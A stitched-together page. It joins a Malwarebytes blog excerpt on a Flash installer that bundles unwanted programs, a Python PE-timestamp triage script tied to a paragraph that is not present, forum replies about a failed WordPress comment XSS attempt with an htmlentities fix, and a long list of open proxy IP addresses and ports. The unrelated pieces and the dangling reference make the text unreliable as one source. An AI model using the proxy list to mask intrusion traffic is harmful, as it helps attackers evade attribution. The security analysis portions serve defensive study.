A digital certificate is a trust of authenticity but can be abused and certainly can be used to ‘boost’ a program’s credibility. The certificate details show that said company is located in Tel Aviv, Israel and a VirusTotal scan hints at a connection with InstallCore, a “digital content delivery platform”. The link between the two companies can be established from this blog statement:

In early 2013, Fried Cookie proudly announced a formal partnership with installCore. We are now both under the ironSource umbrella of products.

The offers

The first offer cannot be opted out from; you must accept it in order to keep going:

This mandatory offer installs the Vosteran Browser, a Chromium-based browser created by Fried Cookie Ltd. Most searches to download the Vosteran Browser on its own return results for how to remove it instead:

Finally, Vosteran’s privacy policy states that:

We may also use a third party tracking service that uses cookies (analytics) to track aggregate non-Personal Identifiable Information regarding our Software and/or Services. Please note that We have no control over third parties privacy policies.

This essentially means that Vosteran Search cannot be held liable for abuses committed by third parties.

There are also various other offers bundled in this installer, courtesy of a “distributer” called Entarion Ltd., with an “address” conveniently located in Cyprus, well-known as a safe haven for offshore companies.

d.updateweb.org
softwareportals@gmail.com
Stratigou Spyrou Stathopoulou, 14B, 3066, Limassol, Cyprus

Note that the domain is using Privacy Protect to hide the registrant’s details. However, a search on the Gmail address shows that there is another domain seemingly belonging to an individual in St Petersburg, Russia.
It doesn’t take too long to find several reports of unwanted pop-ups aggressively pushing bogus registry cleaners, many of which are funneled through securedshopgate.com, a well hidden portal with an SSL certificate tied to an address in Cyprus, once again:

Installing the Flash Player from this installer is not an easy task due to the large number of promoted software:

It could be argued that this particular example is not the norm and that most download managers do explicitly let the user choose or decline additional pieces of software that have been vetted as legitimate. However, opposite examples do exist as well and do cause a lot of headaches and large amounts of money spent on programs whose effectiveness can be questioned.

To quickly remove any trace from these Potentially Unwanted Programs (PUPs), you can download and run Malwarebytes Anti-Malware:

Malwarebytes’ criteria for listing a program as a PUP can be viewed here. The list is pretty thorough and will most likely continue to evolve as PUP makers diversify their operations.

Consumers should be able to make educated choices rather than being misled down a path that they didn’t intend to take. Unfortunately, because software bundles are such an attractive business model from a financial standpoint, the line between legitimate and fraudulent gets crossed too many times.

Special thanks to Adrian Gill, Joshua Cannell and JP Taggart for additional research assistance.

Source: https://blog.malwarebytes.org/fraud-scam/2014/12/potentially-unwanted-program-borrows-tricks-from-malware-authors/
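The compile-date check from the "Time stamp" paragraph of the post above, as an added example that is not part of the Malwarebytes article: it reads TimeDateStamp from a PE header and separates the fixed value that Delphi-built binaries carry (the bug @Hexacorn points out) from other out-of-range dates. The constant 0x2A425E19, the 1993 cut-off, the label names and the header bytes are this example's assumptions; the header is constructed and is not the sample from the post.

```python
import struct
from datetime import datetime, timezone

# Value commonly seen in Delphi-built PE files: 1992-06-19 22:22:17 UTC.
# Assumption of this example, not a value quoted in the post.
DELPHI_PLACEHOLDER = 0x2A425E19

# The PE format first shipped with Windows NT 3.1 in 1993, so an earlier
# compile date cannot be genuine (cut-off chosen for this example).
PE_ERA_START = datetime(1993, 1, 1, tzinfo=timezone.utc)


def pe_timestamp(data):
    """Return the COFF TimeDateStamp (seconds since 1970, UTC) of a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)   # offset of "PE\0\0"
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # COFF header follows the signature: Machine, NumberOfSections, TimeDateStamp
    _machine, _sections, stamp = struct.unpack_from("<HHI", data, e_lfanew + 4)
    return stamp


def to_utc(stamp):
    """Convert a TimeDateStamp to an aware UTC datetime."""
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


def classify(stamp, now=None):
    """Label a TimeDateStamp for triage. The field is set by the build tool
    and can be edited freely, so 'plausible' is not evidence of anything."""
    now = now or datetime.now(timezone.utc)
    if stamp == 0:
        return "zero"
    if stamp == DELPHI_PLACEHOLDER:
        return "delphi-placeholder"      # toolchain artefact, not anti-forensics
    when = to_utc(stamp)
    if when < PE_ERA_START:
        return "before-pe-format"
    if when > now:
        return "future"
    return "plausible"


def build_constructed_header(stamp):
    """Build a minimal, constructed MZ + PE/COFF header carrying `stamp`."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)    # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x014C, 0, stamp, 0, 0, 0, 0x0102)
    return dos + b"PE\0\0" + coff


if __name__ == "__main__":
    for stamp in (DELPHI_PLACEHOLDER, 0, 0x10000000, 0x54A33E00):
        value = pe_timestamp(build_constructed_header(stamp))
        print(hex(value), to_utc(value).isoformat(), classify(value))
```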
  10. It didn't work on RST, and I didn't do anything special. It was stripping <script> for me. I tried other vectors too and it still didn't work. I also tried on one more blog and, likewise, it didn't work. PS: Don't bother trying on RST.

wp-comments-post.php

    $comment_content = ( isset($_POST['comment']) ) ? trim($_POST['comment']) : null;

changed to

    $comment_content = ( isset($_POST['comment']) ) ? trim(htmlentities($_POST['comment'], ENT_QUOTES)) : null;
  11. It didn't really work...
  12. It's New Year's Eve, nobody has time for that sort of thing today
  13. 31-12-14 | Free SSL Proxies (3103) By: gelbeseiten on Dec 30th, 2014 Checked & filtered (Secure Socket Layer Proxies)
183.220.245.89:8123 183.220.246.241:8123 183.220.247.22:8123 183.220.40.155:8123 183.220.44.84:8123 183.220.45.33:8123 183.220.45.52:8123 183.220.46.103:8123 183.220.46.190:8123 183.221.146.26:8123 183.221.147.172:8123 183.221.160.100:8123 183.221.160.198:8123 183.221.160.38:8123 183.221.162.113:8123 183.221.172.145:8123 183.221.185.107:8123 183.221.187.122:8123 183.221.187.6:8123 183.221.187.74:8123 183.221.190.112:8123 183.221.190.51:8123 183.221.217.221:8123 183.221.217.34:8123 183.221.220.29:8123 183.221.50.64:8123 183.221.53.94:8123 183.221.54.91:8123 183.222.101.251:8123 183.222.152.168:8123 183.222.152.202:8123 183.222.152.236:8123 183.222.152.42:8123 183.222.152.70:8123 183.222.152.90:8123 183.222.153.14:8123 183.222.153.145:8123 183.222.153.204:8123 183.222.153.207:8123 183.222.153.218:8123 183.222.153.54:8123 183.222.153.61:8123 183.222.153.8:8123 183.222.154.26:8123 183.222.154.48:8123 183.222.154.68:8123 183.222.154.77:8123 183.222.155.107:8123 183.222.155.19:8123 183.222.155.225:8123 183.222.155.69:8123 183.222.155.75:8123 183.222.156.12:8123 183.222.156.15:8123 183.222.156.150:8123 183.222.156.217:8123 183.222.156.53:8123 183.222.157.124:8123 183.222.157.154:8123 183.222.157.164:8123 183.222.157.231:8123 183.222.157.243:8123 183.222.157.3:8123 183.222.157.37:8123 183.222.157.47:8123 183.222.157.55:8123 183.222.158.119:8123 183.222.158.206:8123 183.222.158.224:8123 183.222.158.30:8123 183.222.158.44:8123 183.222.158.5:8123 183.222.158.65:8123 183.222.159.104:8123 183.222.159.208:8123 183.222.161.58:8123 183.222.164.82:8123 183.222.166.227:8123 183.222.171.117:8123 183.222.171.149:8123 183.222.171.215:8123 183.222.172.159:8123 183.222.172.238:8123 183.222.172.241:8123 183.222.173.114:8123 183.222.174.132:8123 183.222.176.53:8123 183.222.182.151:8123 183.222.182.155:8123 183.222.182.40:8123 183.222.183.120:8123 183.222.246.198:8123 183.222.246.219:8123 183.222.250.121:8123 183.222.250.169:8123 183.222.250.180:8123 183.222.250.181:8123 
183.222.250.244:8123 183.222.250.253:8123 183.222.252.167:8123 183.222.252.243:8123 183.222.252.92:8123 183.222.254.31:8123 183.222.255.146:8123 183.222.255.21:8123 183.222.255.27:8123 183.222.64.163:8123 183.222.65.189:8123 183.222.72.198:8123 183.222.74.207:8123 183.222.75.185:8123 183.222.81.191:8123 183.222.86.183:8123 183.222.87.167:8123 183.222.96.148:8123 183.222.98.28:8123 183.223.10.142:8123 183.223.10.195:8123 183.223.10.50:8123 183.223.11.39:8123 183.223.12.20:8123 183.223.12.68:8123 183.223.13.192:8123 183.223.13.252:8123 183.223.15.197:8123 183.223.152.12:8123 183.223.153.247:8123 183.223.154.30:8123 183.223.157.198:8123 183.223.159.139:8123 183.223.16.202:8123 183.223.161.105:8123 183.223.166.123:8123 183.223.166.248:8123 183.223.167.85:8123 183.223.168.158:8123 183.223.168.167:8123 183.223.169.107:8123 183.223.169.159:8123 183.223.169.22:8123 183.223.170.8:8123 183.223.171.157:8123 183.223.172.202:8123 183.223.172.230:8123 183.223.173.133:8123 183.223.173.137:8123 183.223.173.182:8123 183.223.173.58:8123 183.223.174.252:8123 183.223.174.90:8123 183.223.18.141:8123 183.223.18.251:8123 183.223.184.115:8123 183.223.185.213:8123 183.223.19.186:8123 183.223.19.238:8123 183.223.192.161:8123 183.223.192.165:8123 183.223.192.205:8123 183.223.193.133:8123 183.223.193.158:8123 183.223.193.58:8123 183.223.194.225:8123 183.223.194.246:8123 183.223.194.91:8123 183.223.195.114:8123 183.223.195.126:8123 183.223.195.130:8123 183.223.195.166:8123 183.223.195.191:8123 183.223.196.165:8123 183.223.196.184:8123 183.223.197.197:8123 183.223.197.209:8123 183.223.197.253:8123 183.223.197.42:8123 183.223.198.16:8123 183.223.199.243:8123 183.223.200.114:8123 183.223.200.61:8123 183.223.200.74:8123 183.223.201.171:8123 183.223.201.188:8123 183.223.202.161:8123 183.223.202.71:8123 183.223.204.126:8123 183.223.204.13:8123 183.223.204.217:8123 183.223.204.26:8123 183.223.208.238:8123 183.223.209.205:8123 183.223.209.76:8123 183.223.21.162:8123 183.223.21.65:8123 
183.223.211.34:8123 183.223.213.81:8123 183.223.215.210:8123 183.223.23.191:8123 183.223.23.56:8123 183.223.242.126:8123 183.223.242.168:8123 183.223.242.199:8123 183.223.242.227:8123 183.223.242.63:8123 183.223.243.202:8123 183.223.243.212:8123 183.223.30.132:8123 183.223.33.102:8123 183.223.33.12:8123 183.223.33.125:8123 183.223.34.154:8123 183.223.36.208:8123 183.223.36.99:8123 183.223.37.78:8123 183.223.40.11:8123 183.223.40.126:8123 183.223.40.241:8123 183.223.40.243:8123 183.223.41.161:8123 183.223.41.97:8123 183.223.9.177:8123 183.223.9.40:8123 183.223.9.98:8123 183.224.1.30:80 183.227.216.80:8123 183.227.217.139:8123 183.227.217.19:8123 183.227.219.83:8123 183.227.252.107:8123 183.227.252.137:8123 183.227.252.158:8123 183.227.26.41:8123 183.227.4.235:8123 183.228.10.196:8123 183.228.109.119:8123 183.228.109.23:8123 183.228.109.39:8123 183.228.11.204:8123 183.228.121.124:8123 183.228.121.171:8123 183.228.122.51:8123 183.228.123.214:8123 183.228.139.29:8123 183.228.156.148:8123 183.228.156.160:8123 183.228.156.6:8123 183.228.157.220:8123 183.228.169.109:8123 183.228.177.44:8123 183.228.178.162:8123 183.228.181.67:8123 183.228.182.152:8123 183.228.183.117:8123 183.228.192.176:8123 183.228.192.59:8123 183.228.196.207:8123 183.228.196.208:8123 183.228.196.4:8123 183.228.197.124:8123 183.228.197.55:8123 183.228.198.184:8123 183.228.198.39:8123 183.228.198.95:8123 183.228.199.175:8123 183.228.199.184:8123 183.228.199.187:8123 183.228.200.222:8123 183.228.201.146:8123 183.228.201.158:8123 183.228.201.174:8123 183.228.208.197:8123 183.228.209.129:8123 183.228.210.110:8123 183.228.216.164:8123 183.228.216.205:8123 183.228.217.10:8123 183.228.217.128:8123 183.228.220.86:8123 183.228.222.85:8123 183.228.223.113:8123 183.228.233.78:8123 183.228.236.91:8123 183.228.239.55:8123 183.228.240.212:8123 183.228.240.41:8123 183.228.246.161:8123 183.228.246.40:8123 183.228.250.153:8123 183.228.252.231:8123 183.228.34.90:8123 183.228.37.196:8123 183.228.38.107:8123 
183.228.38.232:8123 183.228.38.236:8123 183.228.38.46:8123 183.228.39.184:8123 183.228.39.221:8123 183.228.39.36:8123 183.228.40.113:8123 183.228.40.123:8123 183.228.41.66:8123 183.228.42.168:8123 183.228.43.214:8123 183.228.43.46:8123 183.228.66.161:8123 183.228.69.139:8123 183.228.69.42:8123 183.228.71.227:8123 183.228.73.151:8123 183.228.73.179:8123 183.228.73.51:8123 183.228.74.239:8123 183.228.75.240:8123 183.228.78.120:8123 183.228.78.241:8123 183.228.78.45:8123 183.228.79.178:8123 183.228.79.179:8123 183.228.79.40:8123 183.228.88.199:8123 183.228.88.33:8123 183.228.89.166:8123 183.228.89.175:8123 183.228.89.37:8123 183.228.89.69:8123 183.228.9.190:8123 183.228.92.153:8123 183.228.92.201:8123 183.228.92.250:8123 183.228.92.52:8123 183.228.92.61:8123 183.228.92.66:8123 183.228.92.98:8123 183.228.93.105:8123 183.228.93.175:8123 183.228.93.45:8123 183.228.93.79:8123 183.228.94.139:8123 183.230.114.79:8123 183.230.53.49:8123 183.245.209.82:8123 183.245.212.153:8123 183.245.220.203:8123 183.247.240.60:8123 183.247.34.28:8123 183.247.34.78:8123 183.249.37.110:8123 183.249.45.208:8123 183.249.62.44:8123 183.249.8.196:8123 183.60.187.55:80 183.87.129.242:8080 183.90.160.114:8080 185.28.193.95:8080 185.30.147.197:8080 185.37.226.184:18080 185.37.226.184:19350 185.72.156.19:7808 186.14.113.80:8080 186.14.170.171:9064 186.14.247.90:8080 186.193.23.3:3128 186.193.27.73:3128 186.214.149.126:8080 186.25.44.159:8080 186.28.239.156:9064 186.36.19.134:9064 186.88.100.177:8080 186.88.103.81:9064 186.88.161.198:9064 186.88.165.222:9064 186.88.170.20:8080 186.88.171.41:8080 186.88.224.71:8080 186.88.240.100:9064 186.88.244.153:8080 186.88.245.237:8080 186.88.42.217:9064 186.88.98.65:9064 186.89.125.206:9064 186.89.134.71:8080 186.89.151.101:9064 186.89.159.11:8080 186.89.160.85:8080 186.89.178.197:9064 186.89.181.236:8080 186.89.187.155:8080 186.89.196.220:8080 186.89.221.208:9064 186.89.222.74:8080 186.89.255.32:8080 186.89.7.54:8080 186.89.70.178:9064 186.89.87.57:8080 
186.89.95.67:9064 186.90.113.146:9064 186.90.114.47:9064 186.90.121.242:8080 186.90.157.29:8080 186.90.22.90:8080 186.90.24.153:8080 186.90.31.85:9064 186.90.52.47:9064 186.90.65.167:8080 186.90.68.57:8080 186.90.85.70:8080 186.90.89.197:9064 186.90.91.91:8080 186.91.126.72:9064 186.91.185.128:8080 186.91.194.110:9064 186.91.222.229:9064 186.91.255.73:9064 186.91.64.115:8080 186.91.64.185:9064 186.91.70.17:8080 186.91.71.195:8080 186.91.73.88:8080 186.91.76.132:8080 186.91.94.244:8080 186.92.115.109:9064 186.92.118.241:8080 186.92.12.19:8080 186.92.123.67:9064 186.92.152.169:9064 186.92.163.27:8080 186.92.183.1:9064 186.92.189.73:8080 186.92.21.139:8080 186.92.212.153:9064 186.92.22.62:8080 186.92.230.178:9064 186.92.24.186:8080 186.92.240.228:8080 186.92.245.97:9064 186.92.249.97:8080 186.92.31.237:8080 186.92.38.108:8080 186.92.50.85:9064 186.92.55.115:9064 186.92.57.190:8080 186.92.60.144:9064 186.92.61.250:8080 186.92.7.102:8080 186.92.70.247:8080 186.92.83.55:8080 186.92.85.90:8080 186.92.87.41:9064 186.92.88.174:9064 186.92.90.29:8080 186.92.94.27:8080 186.92.99.175:8080 186.93.129.41:8080 186.93.141.114:8080 186.93.165.166:8080 186.93.174.46:8080 186.93.186.209:8080 186.93.193.41:8080 186.93.2.171:9064 186.93.204.210:8080 186.93.218.178:8080 186.93.226.108:9064 186.93.228.236:9064 186.93.229.112:9064 186.93.231.240:8080 186.93.234.216:9064 186.93.235.237:9064 186.93.31.160:9064 186.93.49.123:8080 186.93.49.221:8080 186.93.66.200:9064 186.93.73.13:9064 186.93.73.2:9064 186.93.89.209:9064 186.94.1.210:8080 186.94.102.81:9064 186.94.113.112:9064 186.94.130.7:9064 186.94.146.34:9064 186.94.148.100:9064 186.94.152.162:8080 186.94.156.219:9064 186.94.17.171:9064 186.94.179.72:9064 186.94.184.101:9064 186.94.185.230:9064 186.94.188.200:9064 186.94.19.233:8080 186.94.21.233:9064 186.94.25.141:9064 186.94.3.16:8080 186.94.30.68:8080 186.94.48.38:8080 186.94.57.76:8080 186.94.58.85:9064 186.94.60.31:8080 186.94.66.188:9064 186.94.80.163:9064 186.94.81.96:9064 
186.95.12.105:9064 186.95.134.251:8080 186.95.137.11:9064 186.95.143.105:8080 186.95.149.38:8080 186.95.162.242:8080 186.95.176.146:8080 186.95.178.91:8080 186.95.197.31:8080 186.95.201.220:9064 186.95.206.13:9064 186.95.210.138:9064 186.95.213.251:8080 186.95.214.205:9064 186.95.214.60:9064 186.95.226.156:9064 186.95.226.26:9064 186.95.231.202:8080 186.95.243.244:8080 186.95.51.241:9064 186.95.65.181:9064 186.95.68.210:8080 186.95.68.84:9064 186.95.73.230:8080 186.95.75.242:8080 186.95.8.134:9064 186.95.86.21:8080 186.95.9.10:9064 187.16.38.186:3128 187.16.38.187:3128 187.16.38.188:3128 187.16.44.228:8080 187.5.38.130:8080 187.75.147.132:3128 188.137.99.6:3128 188.237.185.202:8080 189.1.12.163:8080 189.11.175.187:3128 189.14.65.162:8080 189.202.191.60:3128 189.28.237.73:9064 189.35.71.48:9064 189.39.98.174:9064 189.46.231.184:9064 189.81.151.108:8080 189.91.130.130:9064 190.121.148.242:8080 190.142.171.247:9064 190.142.219.159:9064 190.142.248.182:9064 190.151.125.155:8080 190.153.113.227:8080 190.153.38.152:8080 190.198.100.237:9064 190.198.102.68:8080 190.198.108.184:9064 190.198.112.6:9064 190.198.115.133:9064 190.198.117.36:9064 190.198.122.136:9064 190.198.133.176:8080 190.198.146.64:9064 190.198.147.171:8080 190.198.147.26:9064 190.198.152.78:9064 190.198.155.226:8080 190.198.157.34:9064 190.198.177.104:8080 190.198.178.131:9064 190.198.186.61:8080 190.198.209.95:9064 190.198.211.180:9064 190.198.217.24:9064 190.198.225.232:9064 190.198.230.115:9064 190.198.249.109:9064 190.198.249.43:8080 190.198.254.23:9064 190.198.29.198:9064 190.198.31.78:9064 190.198.32.124:9064 190.198.46.236:9064 190.198.5.78:9064 190.198.68.20:9064 190.198.68.84:9064 190.198.76.216:9064 190.198.83.39:9064 190.198.95.120:8080 190.198.97.151:9064 190.199.142.124:8080 190.199.164.57:9064 190.199.195.220:8080 190.199.229.62:8080 190.199.240.249:9064 190.199.250.178:9064 190.199.33.140:9064 190.199.37.65:8080 190.199.50.13:9064 190.199.51.167:8080 190.199.91.175:9064 190.200.135.232:9064 
190.200.156.73:9064 190.200.159.211:8080 190.200.16.246:9064 190.200.181.144:8080 190.200.188.246:8080 190.200.248.149:9064 190.200.51.242:9064 190.201.0.124:8080 190.201.105.185:9064 190.201.106.45:8080 190.201.106.55:9064 190.201.133.254:8080 190.201.133.72:8080 190.201.138.106:8080 190.201.142.75:8080 190.201.15.213:8080 190.201.157.241:8080 190.201.198.151:8080 190.201.25.76:8080 190.201.3.160:8080 190.201.34.107:8080 190.201.7.115:8080 190.201.9.52:8080 190.201.96.29:8080 190.201.98.36:9064 190.202.216.106:8080 190.202.217.195:8080 190.202.217.99:8080 190.202.247.203:8080 190.202.250.66:8080 190.202.252.162:8080 190.202.254.216:8080 190.203.109.180:8080 190.203.110.165:9064 190.203.129.10:8080 190.203.129.140:8080 190.203.129.226:9064 190.203.138.20:9064 190.203.138.77:8080 190.203.141.92:8080 190.203.165.118:9064 190.203.175.215:9064 190.203.205.55:8080 190.203.207.107:8080 190.203.226.251:8080 190.203.237.163:8080 190.203.32.9:8080 190.203.35.147:8080 190.203.35.156:8080 190.203.35.20:8080 190.203.45.59:9064 190.203.71.249:9064 190.203.74.24:8080 190.203.97.92:9064 190.204.103.196:9064 190.204.115.204:8080 190.204.12.158:9064 190.204.128.92:9064 190.204.129.118:8080 190.204.132.205:8080 190.204.150.116:8080 190.204.150.122:8080 190.204.155.87:8080 190.204.164.119:8080 190.204.169.154:8080 190.204.2.71:9064 190.204.226.153:8080 190.204.228.123:9064 190.204.240.2:8080 190.204.249.219:8080 190.204.251.185:8080 190.204.26.84:9064 190.204.46.211:9064 190.204.50.66:8080 190.204.7.193:9064 190.204.76.76:8080 190.204.8.94:9064 190.204.91.29:8080 190.204.92.133:8080 190.204.98.35:8080 190.205.149.164:8080 190.205.18.72:8080 190.205.19.86:9064 190.205.20.181:8080 190.205.210.250:9064 190.205.240.14:8080 190.205.4.140:8080 190.205.5.100:8080 190.206.116.145:8080 190.206.12.98:9064 190.206.120.73:8080 190.206.126.63:8080 190.206.134.127:8080 190.206.161.144:8080 190.206.176.92:9064 190.206.200.85:8080 190.206.210.249:8080 190.206.214.111:8080 190.206.215.216:8080 
190.206.217.212:8080 190.206.218.58:8080 190.206.241.43:8080 190.206.28.3:8080 190.206.52.85:8080 190.206.78.103:8080 190.206.85.148:8080 190.206.86.78:8080 190.207.0.131:8080 190.207.105.106:9064 190.207.110.80:9064 190.207.127.153:9064 190.207.180.35:8080 190.207.185.95:8080 190.207.45.199:8080 190.207.65.103:8080 190.234.157.128:8080 190.253.215.20:9064 190.36.23.243:8080 190.36.25.203:8080 190.36.29.36:8080 190.37.115.55:8080 190.37.233.211:8080 190.37.237.204:8080 190.37.44.135:9064 190.37.69.195:8080 190.38.191.249:8080 190.38.2.13:8080 190.38.209.220:9064 190.38.249.17:8080 190.38.32.92:9064 190.38.62.217:8080 190.38.82.150:8080 190.38.85.133:9064 190.38.90.21:8080 190.39.113.143:8080 190.39.118.111:9064 190.39.131.61:8080 190.39.141.249:8080 190.39.166.17:8080 190.39.193.212:8080 190.39.206.64:8080 190.39.238.246:8080 190.39.240.248:8080 190.39.243.49:8080 190.39.247.4:8080 190.39.46.230:8080 190.39.50.75:8080 190.52.32.126:3128 190.72.130.92:8080 190.72.14.145:8080 190.72.16.87:8080 190.72.17.92:8080 190.72.188.80:8080 190.72.236.71:9064 190.72.25.135:8080 190.72.34.202:8080 190.72.36.201:8080 190.72.49.42:8080 190.72.5.165:8080 190.72.5.82:8080 190.72.62.76:8080 190.73.100.59:8080 190.73.102.75:8080 190.73.104.206:8080 190.73.106.56:8080 190.73.107.108:8080 190.73.108.222:9064 190.73.143.208:8080 190.73.143.29:8080 190.73.161.188:8080 190.73.193.58:9064 190.73.211.179:9064 190.73.231.179:8080 190.73.231.4:8080 190.73.247.107:8080 190.73.40.150:8080 190.73.79.228:8080 190.74.117.193:9064 190.74.124.160:8080 190.74.182.19:8080 190.74.214.156:8080 190.74.59.131:8080 190.74.83.181:8080 190.74.93.28:8080 190.75.105.245:9064 190.75.118.35:8080 190.75.130.113:8080 190.75.42.115:9064 190.75.42.144:8080 190.75.46.172:8080 190.75.49.208:8080 190.75.53.3:8080 190.75.56.49:8080 190.75.72.128:8080 190.75.74.202:8080 190.75.90.149:8080 190.77.117.48:9064 190.77.125.240:8080 190.77.177.208:8080 190.77.18.167:8080 190.77.182.177:8080 190.77.19.75:8080 190.77.215.152:9064 
190.77.217.205:8080 190.77.221.134:8080 190.77.230.139:8080 190.77.245.174:8080 190.77.250.126:8080 190.77.250.74:8080 190.77.26.84:8080 190.77.31.239:8080 190.77.40.31:8080 190.77.47.221:8080 190.77.88.94:8080 190.78.161.93:9064 190.78.168.246:9064 190.78.17.63:8080 190.78.172.112:8080 190.78.176.94:8080 190.78.191.98:8080 190.78.204.161:8080 190.78.21.180:8080 190.78.220.56:8080 190.78.48.245:8080 190.78.53.207:8080 190.78.58.2:8080 190.78.58.45:8080 190.78.63.191:8080 190.78.81.248:9064 190.78.86.220:8080 190.78.88.49:8080 190.79.21.146:8080 190.79.221.204:8080 190.79.24.174:8080 190.79.79.56:8080 190.79.8.20:8080 190.94.203.102:9064 192.119.246.210:3128 195.154.233.59:3128 195.175.42.102:8080 195.190.109.110:3128 195.246.54.7:8080 195.88.192.144:8080 197.161.221.144:8080 199.200.120.140:7808 199.200.120.140:8089 200.103.97.218:80 200.109.145.188:8080 200.109.152.249:8080 200.109.154.114:8080 200.109.35.44:8080 200.109.46.114:9064 200.115.63.195:9064 200.214.132.19:3128 200.222.96.218:8081 200.223.97.194:8080 200.44.253.114:8080 200.46.94.202:3128 200.84.134.22:9064 200.84.206.249:8080 200.84.39.126:8080 200.84.84.219:9064 200.90.78.52:9064 200.93.105.121:8080 200.93.118.121:9064 200.93.15.253:8080 201.208.137.199:8080 201.208.162.14:8080 201.208.183.114:9064 201.208.224.174:8080 201.208.227.182:8080 201.208.233.40:8080 201.208.37.160:9064 201.209.11.161:8080 201.209.193.206:9064 201.209.202.60:9064 201.209.217.49:8080 201.209.225.158:8080 201.209.231.152:8080 201.209.232.133:8080 201.209.239.223:8080 201.209.5.1:8080 201.209.76.172:8080 201.209.89.82:8080 201.209.91.177:8080 201.210.106.192:8080 201.210.125.162:8080 201.210.14.154:8080 201.210.244.216:8080 201.210.53.208:8080 201.210.89.181:8080 201.210.93.4:8080 201.211.110.230:8080 201.211.118.117:8080 201.211.161.158:8080 201.211.176.33:8080 201.211.186.35:8080 201.219.22.43:8080 201.242.153.162:9064 201.242.234.225:8080 201.242.42.21:8080 201.242.44.108:8080 201.242.59.19:8080 201.242.74.128:8080 
201.242.92.107:8080 201.243.100.84:9064 201.243.114.231:8080 201.243.128.49:9064 201.243.168.17:8080 201.243.198.229:8080 201.243.198.247:8080 201.243.198.42:8080 201.243.215.81:9064 201.243.41.90:8080 201.243.59.216:8080 201.243.60.12:9064 201.248.224.117:8080 201.49.104.73:8080 201.80.44.156:8080 202.101.96.154:8888 202.106.16.36:3128 202.106.169.228:8080 202.47.94.106:8080 202.56.231.117:8080 202.99.16.28:3128 203.110.160.14:8080 203.144.144.162:8080 203.144.170.99:3128 203.190.116.235:9064 203.73.225.68:9064 203.91.121.74:3128 207.91.10.234:8080 208.87.77.20:8080 209.170.151.142:7808 209.170.151.142:8089 210.101.131.231:8080 210.195.43.136:3128 210.75.14.158:80 211.144.76.220:80 211.144.81.66:18000 211.144.81.68:18000 211.162.0.163:80 212.109.144.117:8080 212.200.153.157:8080 212.232.52.56:8080 212.76.87.188:8080 213.160.139.74:3128 213.42.212.213:8080 216.109.9.77:8080 217.21.146.209:8080 218.204.159.44:8123 218.205.229.186:3128 218.207.11.93:8123 218.207.13.10:8123 218.207.16.25:8123 218.207.17.169:8123 218.207.27.156:8123 218.207.53.232:8123 218.207.55.172:8123 218.26.13.155:63000 218.44.26.122:8080 218.65.132.38:8081 218.85.78.89:9999 218.90.174.167:3128 219.143.84.46:9000 219.217.227.93:3128 219.246.65.143:3128 219.69.96.181:9064 219.84.218.50:9064 219.93.183.106:8080 220.129.161.154:9064 220.143.168.185:9064 220.143.209.133:9064 220.198.117.99:9999 220.231.32.195:3128 221.178.1.49:8123 221.178.110.193:8123 221.178.117.98:8123 221.178.119.188:8123 221.178.119.201:8123 221.178.119.226:8123 221.178.125.221:8123 221.178.15.154:8123 221.178.22.107:8123 221.178.22.170:8123 221.178.24.119:8123 221.178.25.36:8123 221.178.25.98:8123 221.178.28.141:8123 221.178.28.161:8123 221.178.28.57:8123 221.178.29.137:8123 221.178.30.181:8123 221.178.30.213:8123 221.178.30.8:8123 221.178.30.88:8123 221.178.31.111:8123 221.178.45.170:8123 221.178.45.30:8123 221.178.45.89:8123 221.178.52.29:8123 221.178.53.162:8123 221.178.53.221:8123 221.178.54.23:8123 221.178.55.57:8123 
221.178.65.124:8123 221.178.67.196:8123 221.178.76.155:8123 221.178.76.44:8123 221.178.77.245:8123 221.178.77.88:8123 221.178.78.63:8123 221.178.79.202:8123 221.178.79.241:8123 221.178.80.130:8123 221.178.83.147:8123 221.178.85.221:8123 221.178.85.251:8123 221.178.96.216:8123 221.178.96.226:8123 221.178.96.233:8123 221.178.97.56:8123 221.178.98.105:8123 221.178.98.85:8123 221.178.98.9:8123 221.178.99.189:8123 221.178.99.73:8123 221.182.62.114:9999 221.182.74.112:8123 221.182.74.123:8123 221.193.249.140:3128 221.223.106.46:3128 221.238.140.164:8080 222.124.218.83:8080 222.134.47.110:9999 223.197.37.82:80 223.252.33.209:23684 223.255.160.26:3128 223.4.21.184:80 223.64.133.151:8123 223.64.135.121:8123 223.64.165.13:8123 223.64.169.194:8123 223.64.173.102:8123 223.64.182.121:8123 223.64.38.89:8123 223.66.110.117:8123 223.66.186.163:8123 223.66.41.19:8123 223.66.73.41:8123 223.66.74.161:8123 223.66.85.117:8123 223.67.141.167:8123 223.67.152.226:8123 223.67.183.80:8123 223.67.200.202:8123 223.67.201.13:8123 223.67.211.78:8123 223.67.215.158:8123 223.67.215.97:8123 223.67.221.46:8123 223.67.239.118:8123 223.67.239.132:8123 223.67.246.27:8123 223.67.66.185:8123 223.68.6.10:8000 223.82.11.159:8123 223.82.164.241:8123 223.82.167.243:8123 223.82.172.217:8123 223.82.172.241:8123 223.82.172.29:8123 223.82.203.209:8123 223.82.203.61:8123 223.82.204.140:8123 223.82.205.89:8123 223.82.217.93:8123 223.82.222.175:8123 223.82.223.23:8123 223.82.228.227:8123 223.82.228.88:8123 223.82.235.187:8123 223.82.241.164:8123 223.82.242.133:8123 223.82.242.200:8123 223.82.47.163:8123 223.82.6.80:8123 223.82.66.161:8123 223.82.68.24:8123 223.82.69.249:8123 223.82.74.23:8123 223.82.8.148:8123 223.82.82.53:8123 223.82.84.183:8123 223.82.87.29:8123 223.82.9.31:8123 223.82.91.223:8123 223.82.95.64:8123 223.83.136.120:8123 223.83.136.163:8123 223.83.141.228:8123 223.83.141.243:8123 223.83.142.56:8123 223.83.142.77:8123 223.83.161.97:8123 223.83.163.224:8123 223.83.164.248:8123 223.83.166.131:8123 
